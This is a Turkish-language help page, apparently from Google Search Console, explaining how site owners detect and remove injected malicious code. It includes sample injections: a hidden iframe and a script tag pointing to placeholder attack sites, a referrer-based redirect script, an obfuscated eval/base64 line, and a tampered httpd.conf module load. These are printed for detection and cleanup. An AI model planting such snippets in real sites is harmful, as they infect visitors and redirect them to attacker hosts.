Kötü amaçlı yazılım bulaşma türü: Kod yerleştirme

Google Search Console'da kötü amaçlı yazılım bulaşma türlerinden “Kod yerleştirme” ile işaretlenmiş sayfalara sahip olmak ne demektir?

Bu, sitenizdeki sayfaların zararlı kod (ör. bir kötü amaçlı yazılım saldırı sitesine iframe) içerecek şekilde değiştirildiği anlamına gelir.

Kötü amaçlı yazılımlar hakkında daha fazla genel bilgi edinmek için Hasarı değerlendirme (kötü amaçlı yazılımla saldırıya uğramış) konusuna bakın.

"Kod yerleştirme" kötü amaçlı yazılım türünü nasıl araştırabilirim?

Öncelikle, sitenizdeki zararlı kod eklenmiş sayfaları görüntülemek için bir tarayıcı kullanmaktan kaçının. Kötü amaçlı yazılımlar çoğunlukla tarayıcılardaki güvenlik açıklarını kullanarak yayıldığından, kötü amaçlı yazılımın bulaştığı bir sayfayı bir tarayıcıda açmak bilgisayarınıza zarar verebilir.

HTTP istekleri gerçekleştirmek (örneğin, bir sayfa getirmek) için cURL veya Wget'i kullanarak davranışı onaylamayı düşünün. Ücretsiz kullanılabilen bu araçlar yönlendirmeleri teşhis etmeye yardımcı olur ve yönlendiren veya kullanıcı aracısı bilgileri ekleme esnekliğine sahiptir. Bilgisayar korsanı, zararlı içeriği yalnızca belirli kullanıcı aracılarına veya yönlendirenlere sahip kullanıcılara sunarak daha "gerçek kişileri" hedefleyebilir ve site sahiplerinin ve kötü amaçlı yazılım tarayıcılarının algılamasından kurtulabilir. (Bu araçların kullanılabilmesi için siteniz çevrimiçi olmalıdır.)

Örneğin:

$curl -v --referer <yönlendiren-alanı> --user-agent "Mozilla/5.0 (
  Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" <url'niz>
örneğin:
$curl -v --referer "http://www.google.com" --user-agent "Mozilla/5.0 
  (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html

Ardından, dosya sisteminize giriş yapın. "Kod yerleştirme"nin bulaştığı URL'lere veri yazan tüm kaynakları araştırın. Zararlı kod yerleştirmeye ilişkin bazı örnekler şunlardır:

  • Bir saldırı sitesine iframe
  • <iframe frameborder="0" height="0" src="http://<saldırı-sitesi>/path/file" 
      style="display:none" width="0"></iframe>
  • Bir saldırı sitesinden komut dosyası çağıran veya çalıştıran JavaScript veya başka bir kodlama dili:
  • <script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
  • Tarayıcıyı bir saldırı sitesine yönlendiren komut dosyaları
  • <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://malware-attack-site/");
      }
    </script>
  • Algılanmamak için şaşırtma yapan zararlı kodlar
  • eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • Aksi halde yararlı komut dosyalarına rastgele bir şekilde zararlı kodlar yazmak üzere tasarlanmış paylaşılan nesne dosyaları
  • #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

Sitedeki zararlı olabilecek tüm kodları araştırın. iframe kodunu bulmak için [iframe] gibi kelimeleri aramak da yardımcı olabilir. Diğer yardımcı anahtar kelimeler "script", "eval" ve "unescape"tir. Örneğin, Unix tabanlı sistemlerde:

$grep -irn "iframe" ./ | less

Sitemi "kod yerleştirme" kötü amaçlı yazılım türünden nasıl temizlerim?

Sitenizi temizlemeye hazır olduğunuzda (Saldırıya Uğramış Site İçin Yardım kurtarma işleminin 7. Adımı), etkilenen dosyaları eldeki en son iyi yedekle değiştirebilir veya yerleştirilen kodu her bir sayfadan ve ilgili tüm komut dosyası işlevlerinden veya dosyalarından kaldırabilirsiniz. Sunucu yapılandırma dosyalarını değiştirdiyseniz, değişikliklerin geçerli olabilmesi için web sunucunuzu yeniden başlatmanız gerekebilir.

Zararlı kodu kaldırmakla, bilgisayar korsanının ilk başta sitenizin güvenliğini ihlal etmesine izin veren temeldeki güvenlik açığını ortadan kaldırmadığınıza lütfen dikkat edin. Asıl nedeni ortadan kaldırmadığınız sürece sitenizin güvenliği gelecekte tekrar ihlal edilecektir. Sadece bu kötü amaçlı yazılım türünü değil, tüm sitenizi temizleme hakkında daha fazla bilgi edinmek üzere, Saldırıya Uğramış Siteler İçin Yardım'a (özellikle 5. Adım: Hasarı değerlendirme (kötü amaçlı yazılımla saldırıya uğramış) konusunda "Dosya sistemi hasar değerlendirmesi" bölümüne) bakın.

Bu size yardımcı oldu mu?
Bunu nasıl iyileştirebiliriz?